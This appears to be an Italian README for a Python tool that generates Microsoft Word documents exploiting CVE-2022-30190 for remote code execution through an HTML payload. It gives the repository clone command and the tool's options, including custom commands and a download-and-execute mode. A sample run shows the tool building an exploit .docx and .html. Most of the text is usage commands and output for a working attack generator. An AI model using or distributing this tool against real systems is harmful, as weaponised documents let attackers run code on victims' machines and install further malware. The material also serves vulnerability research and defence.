
Script Python che genera documenti Microsoft Office che sfruttano CVE-2022-30190 per l'esecuzione remota di codice tramite payload HTML, con supporto per comandi personalizzati e modalità di download ed esecuzione.
Questo script tenterà di creare un documento di Microsoft Office che eseguirà codice in remoto.
git clone https://github.com/joshuavanderpoll/CVE-2022-30190.git
cd CVE-2022-30190
python3 CVE-2022-30190.py --help
usage: CVE-2022-30190.py [-h] [--html HTML] [--cmd CMD] [--downexec]
[--download_url DOWNLOAD_URL]
Generate CVE-2022-30190 Word documents.
optional arguments:
-h, --help mostra questo messaggio di aiuto ed esci
--html HTML URL del file HTML exploit online
--cmd CMD Comando che si desidera eseguire all'avvio
--downexec Abilita la modalità di download ed esecuzione
--download_url DOWNLOAD_URL
Sorgente da cui scaricare ed eseguire
$ python3 CVE-2022-30190.py --doc="Original.docx" --html="http://localhost/Exploit.html" --cmd="start https://github.com/joshuavanderpoll"
[@] Avvio del generatore CVE-2022-30190...
[•] Creato da https://github.com/joshuavanderpoll
[•] Utilizzo del documento Word: Original.docx
[•] Deflazione del documento Word...
[•] Documento Word deflato.
[√] Documento Word sfruttato salvato in "./builds/Exploit.docx" (1109 byte).
[√] File HTML exploit salvato in "./builds/Exploit.html" (4241 byte).